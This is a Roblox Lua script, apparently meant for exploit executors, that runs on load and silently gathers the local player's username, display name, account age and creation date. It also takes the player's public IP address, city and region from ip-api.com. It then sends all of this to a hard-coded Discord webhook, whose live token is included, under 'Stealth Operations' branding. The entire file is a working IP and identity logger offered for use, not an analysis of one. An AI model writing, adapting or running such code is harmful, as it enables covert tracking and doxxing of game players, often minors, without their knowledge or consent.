
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local lp = Players.LocalPlayer


local Webhook_URL = "https://discord.com/api/webhooks/1492078460548415508/0DTMWHe9C_Sa4TPWWzGirUVetHdZLsys6riUbvIp6b14gXJSZi3RMK1jJzaewG81L8vp"


local function HttpRequest(url, method, body)
    local requestFunc = (syn and syn.request) or (http and http.request) or (http_request) or (fluxus and fluxus.request) or request
    
    if requestFunc then
        return requestFunc({
            Url = url,
            Method = method or "GET",
            Headers = {["Content-Type"] = "application/json"},
            Body = body
        })
    else
        if method == "POST" then
            return HttpService:PostAsync(url, body)
        else
            return HttpService:GetAsync(url)
        end
    end
end

local function GetUserData()
    -- Dados Básicos
    local user_id = lp.UserId
    local username = lp.Name
    local display_name = lp.DisplayName
    
    
    local thumb = "https://www.roblox.com/headshot-thumbnail/image?userId="..user_id.."&width=420&height=420&format=png"
    
    
    local public_ip = "N/A"
    local localidade = "Desconhecida"
    local estado = "N/A"
    
    
    pcall(function()
        local response = HttpRequest("http://ip-api.com/json/")
        local data = HttpService:JSONDecode(type(response) == "table" and response.Body or response)
        
        if data and data.status == "success" then
            public_ip = data.query
            localidade = data.city
            estado = data.regionName
        end
    end)

    
    local creation_date = "N/A"
    pcall(function()
        local res = HttpRequest("https://users.roproxy.com/v1/users/"..user_id)
        local data = HttpService:JSONDecode(type(res) == "table" and res.Body or res)
        if data and data.created then
            local date = data.created:sub(1, 10)
            local y, m, d = date:match("(%d+)-(%d+)-(%d+)")
            creation_date = d.."/"..m.."/"..y
        end
    end)

    
    local data = {
        ["content"] = "||@everyone @here||",
        ["username"] = "Morningstars",
        ["embeds"] = {{
            ["title"] = "Nova Conta",
            ["description"] = "Acesso detectado.",
            ["color"] = 0, -- Cor Preta (Minimalista)
            ["thumbnail"] = {["url"] = thumb},
            ["footer"] = {["text"] = "© 2026 Morningstars Legacy • Stealth Operations"},
            ["fields"] = {
                {["name"] = "Usuário", ["value"] = "**" .. username .. "** ("..display_name..")", ["inline"] = true},
                {["name"] = "Criação", ["value"] = creation_date, ["inline"] = true},
                {["name"] = "Idade da Conta", ["value"] = lp.AccountAge .. " dias", ["inline"] = true},
                {["name"] = "Localização", ["value"] = localidade .. ", " .. estado, ["inline"] = true},
                {["name"] = "Endereço IP", ["value"] = "||" .. public_ip .. "||", ["inline"] = true},
                {["name"] = "Links", ["value"] = "[Perfil](https://www.roblox.com/users/"..user_id.."/profile) | [Rolimons](https://www.rolimons.com/player/"..user_id..")", ["inline"] = false},
            }
        }}
    }

    
    pcall(function()
        HttpRequest(Webhook_URL, "POST", HttpService:JSONEncode(data))
    end)
end


GetUserData()
